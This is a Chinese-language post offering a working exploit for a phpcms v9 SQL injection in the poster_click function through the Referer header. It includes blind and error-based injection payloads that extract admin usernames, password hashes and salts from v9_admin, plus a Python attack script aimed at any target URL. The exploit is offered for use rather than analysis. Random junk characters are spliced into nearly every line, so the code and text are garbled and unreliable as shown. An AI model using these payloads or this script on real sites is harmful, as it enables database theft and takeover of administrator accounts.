有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
$ v4 N' B9 J: X* g
0 h- x1 G* [+ r7 A+ {3 J) t7 H问题函数\phpcms\modules\poster\index.php
: x: F+ a: S: a( {9 Q4 K9 Q9 K+ K4 l3 @! Q1 d- n! _( \
public function poster_click() {3 g9 U+ M% L. Z/ B% l2 V
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
7 e! J+ m2 l+ j$r = $this->db->get_one(array('id'=>$id));
5 g6 v: [7 b. R( j6 r; `% X! lif (!is_array($r) && empty($r)) return false;4 J3 q% I1 C! K
$ip_area = pc_base::load_sys_class('ip_area');
7 w4 x4 B) L% y* O$ip = ip();4 k4 [- g1 |5 U, ~. j! w
$area = $ip_area->get($ip);6 p Z3 C9 C x
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
3 A3 ?! d" l/ Gif($id) {
' o Q0 x! L& g9 l2 r1 C$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
/ i9 Y! G# U$ Z$ S$ u1 \$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));0 J& \1 ]6 A- G6 E' U
}
% G: l, l5 y! X1 K4 [% r$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
" f8 r" M5 D3 d1 \9 U$setting = string2array($r['setting']);
8 X6 C! m0 m, ?* j4 N/ |: hif (count($setting)==1) {8 A2 H+ f8 p, t3 y
$url = $setting['1']['linkurl'];" t# u9 ]" U1 [ B
} else {6 B; D* U; M* Q3 n
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
5 M$ K( l' z7 q+ t}% W% s; ? A2 l: L" H/ |
header('Location: '.$url);
9 X( X, f! f! E9 ?/ G}5 G# s% V/ z M# x) D1 f( R( s) }
' h1 K6 s% r# ]2 q
' f! G f) s8 U' n+ W
6 E( I2 w, ]8 s9 e$ E; c5 j6 R利用方式: R# m$ _$ C7 l3 y+ B
: A9 w3 A& n9 |- _+ ]: w+ A% P2 O/ l
1、可以采用盲注入的手法: T Z2 e. Y6 T) O2 O5 n O9 m* `9 J3 O
; Q* r. i; [( G# e4 breferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
7 c1 k+ P/ Y M1 r9 n) V
- C- ]8 O3 V% S; I' }/ B: u通过返回页面,正常与否一个个猜解密码字段。
( G% }6 w4 ]; l. \5 |8 q/ q
7 x' U9 N0 J, J4 z" P2、代码是花开写的,随手附上了:
9 S: g+ p# Z, k, z" T+ N
& {. d$ c2 O. l0 j; c% i5 ~1 n1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
E9 [7 q, M( M6 M3 F/ A; E# F `2 t0 F* p* [$ @3 b6 p; }+ Y
此方法是爆错注入手法,原理自查。
( G0 G ~( V# R# `9 Q/ v' c9 V) X( Y& ~( R! C
- ?$ y* N* s! L* M% z3 l8 c1 f) k( ?* i U" M1 r* M5 y
利用程序:0 y/ ~4 r8 t: p! W
- S4 N% \( a6 z. Q) g* i* ^#!/usr/bin/env python
1 w4 \, L* F/ G* u# oimport httplib,sys,re( x' N H5 s$ S. O! g$ F: g. P
- m! q2 | l& |0 k" k2 Ldef attack():( x9 ^2 h0 V. i; e, I: F G
print “Code by Pax.Mac Team conqu3r!”/ w, o1 G# C& V# z ]( }) B/ D5 E
print “Welcome to our zone!!!”
) C2 ]: |8 U$ m+ k7 X' _+ ]% Kurl=sys.argv[1]
* G: S- R) ?* N$ ?, p- h! Tpaths=sys.argv[2]( y$ x5 l: w! `% X
conn = httplib.HTTPConnection(url)
; r0 { n+ V3 li_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
9 h5 D! W2 g; B4 t; k: r$ X“Accept”: “text/plain”,- F# Y" u* ]9 p& H/ a d+ d# D* B# I
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
5 o: r F& ^6 `9 sconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
$ c8 w- b1 I' ?$ {: t5 K: Kr1 = conn.getresponse()7 P! N( x8 T' \' q7 R/ [" V
datas=r1.read()
- W$ U" O% k; x G, r0 d( Idatas=re.findall(r”Duplicate entry \’\w+’”, datas)
6 J) U* t6 r5 C; {% I+ L5 ~print datas[0]# _3 P2 K* i" H" r# F1 H+ }& F
conn.close()" I1 v6 g, C2 g9 j" t9 ~
if __name__==”__main__”:1 r$ X) r- E: R) q- U
if len(sys.argv)<3:6 v, b+ }+ a8 a1 ^3 \. |9 V
print “Code by Pax.Mac Team conqu3r”
8 e+ M% D- [/ x. n* xprint “Usgae:”
9 Y, M+ X8 F# g( N1 j. Qprint “ phpcmsattack.py www.paxmac.org /”
) h. @( q8 U+ ]- p" oprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”9 z0 ^4 E3 |* M2 q
sys.exit(1)
+ {0 {" c3 i8 z- D# D4 S$ d9 Dattack() p P# |$ s$ b( [8 v: H
! b) }1 M2 t, R: v8 Y* n0 l) s. z- s3 u |